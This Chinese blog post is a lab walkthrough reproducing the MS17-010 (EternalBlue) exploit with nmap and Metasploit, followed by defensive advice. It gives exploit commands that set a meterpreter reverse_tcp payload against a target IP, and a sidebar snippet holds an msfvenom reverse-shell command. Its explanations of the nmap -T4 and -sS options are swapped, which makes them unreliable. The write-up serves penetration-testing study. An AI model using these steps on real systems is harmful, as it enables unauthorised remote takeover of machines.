记一次ms17-010(永恒之蓝)漏洞复现

已于 2024-05-19 22:28:01 修改
阅读量1.1k 收藏 30
点赞数 37
分类专栏: 网络安全 文章标签: 网络安全 系统安全 安全
于 2024-05-13 22:23:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47830774/article/details/138820141
版权

1.漏洞介绍:

        永恒之蓝(ms17-010)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。

1.2影响版本:

        这个漏洞影响了多种Windows系统,包括Windows Vista、Windows 7、Windows 8.1、Windows 10(包括服务器版本如Windows Server 2008、Windows Server 2012等)。特别是那些未启用或未正确配置防火墙、未及时更新补丁的系统,更容易受到攻击。

1.3漏洞原理:

        永恒之蓝漏洞是一种缓冲区溢出漏洞。攻击者可以通过向Windows服务器的SMBv1服务发送精心构造的恶意数据包,导致服务器上的SMB服务崩溃或执行任意代码。这样,攻击者就可能获得对被攻击系统的完全控制权。

1.4漏洞防护:
        微软已于2017 年 发布MS17-010补丁,修复了“永恒之蓝”攻击的系统漏洞,一定要及时更新系统补丁;务必不要轻易打开doc、rtf等后缀的附件;内网中存在使用相同账号、密码情况的机器请尽快修改密码,未开机的电脑请确认口令修改完毕、补丁安装完成后再进行联网操作,可以下载“永恒之蓝”漏洞修复工具进行漏洞修复。

接下来我们开始漏洞复现:

2.信息收集:

2.1.主机扫描:

arp-scan -l

2.2.端口扫描:

nmap -O -T4 -sS 192.168.58.135

注解: 

-O: Nmap进行操作系统识别。它会尝试通过分析目标主机的网络行为和响应来猜测其运行的操作系统类型。

-T4:启用了TCP SYN扫描(也称为半开放扫描)。在进行端口扫描时,Nmap发送一个TCP SYN包到目标主机上的每个目标端口,如果收到了一个SYN/ACK响应,说明该端口是打开的。

-sS:4是Nmap的默认设置之一,表示较高的扫描速度和更少的等待时间。

3.漏洞探测:

msfconsole # open msf

search ms17-010 # 搜寻模块

use 24 # 选择第24个模块

show missing # 查看需要配置哪些信息

3.1.这里只需要配置被攻击方ip地址:

3.2.使用show options选项,查看我们要输入的具体参数,其中标注了yes的选项是必须的参数,若这个参数为空,则需要我们填写。

3.3.Run开始攻击:

输出信息提示: 该主机可能容易受到攻击(说明该系统存在ms17_010漏洞)

4.漏洞利用:

search ms17-010

use 0 # 选择第0个模块

4.1.设置payload连接的方式,reverse_tcp为反向连接,即受害机主动连接攻击机,以获取shell。

set payload windows/x64/meterpreter/reverse_tcp

4.2.设置靶机ip地址:

set rhosts 192.168.58.135

4.3.开始攻击Run:

成功拿下该主机shell !!!!!

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

最后对于防范MS17-010(也被称为“永恒之蓝”漏洞)的建议,主要有以下几点:

  1. 及时更新系统补丁
    • 这是最直接且有效的防范措施。微软已经针对此漏洞发布了修复补丁,因此建议用户及时从微软官方网站下载并安装这些补丁,以确保系统的安全性。
  2. 禁用SMB v1协议
    • MS17-010漏洞主要利用了SMB v1协议中的漏洞进行攻击,因此禁用SMB v1协议可以显著降低系统被攻击的风险。用户可以通过控制面板的“程序”选项中的“打开或关闭Windows功能”,取消勾选“SMB 1.0/CIFS文件共享支持”来禁用SMB v1协议。
  3. 使用防火墙限制端口
    • 防火墙可以限制SMB协议使用的端口(默认为445端口),只允许指定的IP地址和端口访问SMB服务。这样可以进一步降低系统被未授权访问的风险。
  4. 强化密码策略
    • 使用强密码并定期更改密码是保护系统安全的基本措施。建议用户采用包含大小写字母、数字和特殊字符的复杂密码,并定期更换密码。
  5. 安装杀毒软件
    • 安装杀毒软件可以及时发现并清除病毒文件,防止被黑客利用病毒入侵系统。建议用户选择知名的杀毒软件,并保持其更新到最新版本。
  6. 加强网络安全意识
    • 用户应该加强网络安全意识,不要轻易打开陌生邮件、链接、文件等,避免被黑客利用社会工程学攻击手段入侵系统。
  7. 备份重要数据
    • 定期备份重要数据是防范各种安全威胁的重要措施。即使系统受到攻击,也可以通过恢复备份数据来减少损失。
  8. 使用最新的操作系统和软件
    • 随着技术的不断发展,新的操作系统和软件版本通常包含更多的安全特性和修复了已知的安全漏洞。因此,建议用户尽量使用最新的操作系统和软件版本。

免责声明:

本人所有文章均为技术分享,均用于学习为目的的记录,所有操作均在实验环境下进行,请勿用于其他用途,否则后果自负。
像linux的企鹅
关注
  • 37
    点赞
  • 30
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
Ms17-010永恒之蓝漏洞复现
千寻的博客
01-04 1472
Ms17-010永恒之蓝漏洞复现 0x00 漏洞介绍 永恒之蓝是指2017年4月14日晚, “永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限 2017年5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,在多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。 0x01漏洞原理 永恒之蓝漏洞是方程式组织在其漏洞利用框架中一个针对S...
Windows 7 ms17-010永恒之蓝漏洞复现
m0_51600840的博客
07-04 2132
复现ms17-010漏洞环境:1.进入框架:msfconsole 2.使用search命令查找相关漏洞: search ms17-010 3.使用use进入模块: use exploit/windows/smb/ms17_010_eternalblue 4.设置本机地址:set lhost 192.168.238.130(输入自己本机的IP地址即kali虚拟机地址) 5. 设置靶机地址:set rhost 192.168.238.128(输入靶机的IP地址即Windows 7虚拟机地址) 注意靶机地址和攻
永恒之蓝ms17_010方程式漏洞利用工具.rar
12-03
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.***.*** LPORT=4**** -f dll > x64.dll,reverse或者bind方式,替换到目录下,执行第一个检测安装backdoor,第二个选项卡attack就可以了。方式可以直接打靶机,可以上传到跳板机执行。
ms17-101补丁,永恒之蓝补丁
11-25
有效防止基于msb攻击的病毒,永恒之蓝,蠕虫病毒。。。。
永恒之蓝ms17010漏洞检测工具
04-19
在司徒西大神易语言ms17010漏洞检测源码上稍做修改,并做成了批处理,可以单机也可以网段批量检测永恒之蓝漏洞。优点是体积小,扫描准确。缺点是扫描速度较慢。 使用方法: 此程序为易语言开发,如被误报病毒,可以将文件从隔离区恢复,添加信任。 下载后假设文件解压放在D盘 运行方式: 一、直接打开ms17010目录,运行“点我运行.bat”。如果运行报错 “The system cannot write to the specified device”,用以下方式运行。 二、 1.1 Win键+R键,打开运行,输入:cmd 2.1 在终端输入:cd /d d:\ms17010 3.1 测试本机:ms17010pc.exe 127.0.0.1 测试远程单机:ms17010pc.exe 目的IP (注意命令和IP之间有个空格) 3.2 网段批量测试:ms17010.exe 目的网段 例如:ms17010.exe 192.168.188.0/24 (注意命令和IP之间有个空格)
网安永恒之蓝MS17-010检测工具.zip
03-01
永恒之蓝MS17-010漏洞检测工具
永恒之蓝漏洞检测工具
10-10
永恒之蓝漏洞检测工具,用于扫描网络环境是否存在MS17-010漏洞。打开工具后输入ip或者ip网段(如:要检测172.16.21.1-172.16.21.254网段的设备就在里面输入:172.16.21.1/24)就可以检测设备是否有MS17-010漏洞,及时更新,以免勒索病毒入侵。
永恒之蓝漏洞复现(ms17-010)
热门推荐
good good study
01-20 2万+
Metasploit Framework(MSF)是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。在kali中,自带了Metasploit工具。
ms17-010永恒之蓝漏洞复现
xiaosiyue77的博客
05-30 681
ms17-010永恒之蓝漏洞复现
ms17-010永恒之蓝漏洞复现
Filotimo_的博客
09-09 1834
ms17-010永恒之蓝)利用的端口是445端口。本文主要讲解ms17-010永恒之蓝漏洞复现
Windows漏洞 MS17-010 / EternalBlue(永恒之蓝)工具-易语言
06-11
MS17-010 / EternalBlue(永恒之蓝漏洞 检测工具 百度百科: https://baike.baidu.com/item/永恒之蓝 本源码 无调用 任何模块 测试环境: Microsoft Windows XP x86 Microsoft Windows Server 2003 x86 漏洞涉及 win2008 win7 win8等多个系统 具体可以自己测试 XP: 2003 下图 Metasploit 测试的 确实存在漏洞 参考文章:https://www.freebuf.com/articles/terminal/153230.html 参考代码:https://github.com/claudioviviani/ms17-010-m4ss-sc4nn3r
MS17-010永恒之蓝漏洞复现
Dream的博客
09-10 186
永恒之蓝漏洞MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用美国国家安全局泄露的漏洞 “EternalBlue”(永恒之蓝)进行改造而成 ,“永恒之蓝”是利用Windows系统的SMB漏洞来获取Windows系统的最高权限。run显示WIN则代表攻击成功。为了维持操作系统的安全,我们能做到的是及时更新,安装补丁,关闭不必要的服务和端口。
MS17-010永恒之蓝漏洞复现(手把手教程,超细!)
qq_46089119的博客
02-06 6220
ms17-010漏洞利用(本地环境复现)
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8253
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
mac下载安装好软件后提示已损坏
canGfly的博客
05-28 297
打开任何来源后,到应用程序目录中尝试运行软件,如果仍提示损坏,请在应用图标上,鼠标右键,在弹出菜单中点打开。后面加个空格然后再将应用程序目录中的软件拖拽到命令后面,按回车后输入密码执行。如果前面两步仍有问题,请打开终端,在终端中粘贴下面命令。首先确保系统安全设置已经改为任何来源。
登录安全分析报告:小米官网注册
Explinks的博客
05-29 931
图形验证及交互验证方式的安全性到底如何?请看具体分析。
Linux防火墙(以iptables为例)
Tassel_YUE的博客
05-28 994
防火墙是一种网络安全设备,用于监视和控制网络数据流量。其主要功能是在不同网络之间建立一条阻隔,对进出的数据流量进行过滤和筛选,从而保护内部网络免受未经授权的访问和恶意攻击。防火墙通过规则集合控制网络流量的通过与阻止,这些规则可以根据网络策略和需求进行配置。不正确的配置可能导致无法访问特定服务或应用程序。
导线防碰撞警示灯:高压线路安全保障
最新发布
dxzhkj888888的博客
05-30 272
同时,警示灯的反光材料也起到了至关重要的作用,无论是白天还是夜晚,都能将光线反射到最远的距离,让警示效果倍增。导线防碰撞警示灯也叫高压线太阳能警示灯、户外高压线路夜间红色闪光灯,以其独特的设计和卓越的性能,成为了电力安全领域的保障。在广袤的大地上,高压线路如同血脉般纵横交错,然而,在这看似平静的电力输送背后,却隐藏着不容忽视的安全隐患。而到了夜晚,警示灯便开始了它的使命。导线防碰撞警示灯的出现,使得那些驾驶超高车辆、操作超高施工机械的司机们,也在警示灯的提醒下,更加谨慎地行驶和操作,避免了可能发生的危险。
ms17-010永恒之蓝
09-20
ms17-010永恒之蓝)是指微软Windows操作系统中的一个漏洞,该漏洞允许攻击者通过远程执行代码来控制受影响的系统。这个漏洞由美国国家安全局(NSA)开发并利用,在2017年被泄露出来,因此被称为永恒之蓝攻击者可以使用永恒之蓝漏洞来横向传播,感染其他受漏洞影响的系统。 为了利用ms17-010漏洞攻击者通常会使用两个模块:auxiliary/scanner/smb/smb_ms17_010用于扫描是否存在漏洞,exploit/windows/smb/ms17_010_eternalblue用于实际攻击。首先,使用扫描模块对目标进行扫描,如果发现存在漏洞,则可以使用攻击模块对目标进行攻击

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

像linux的企鹅

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值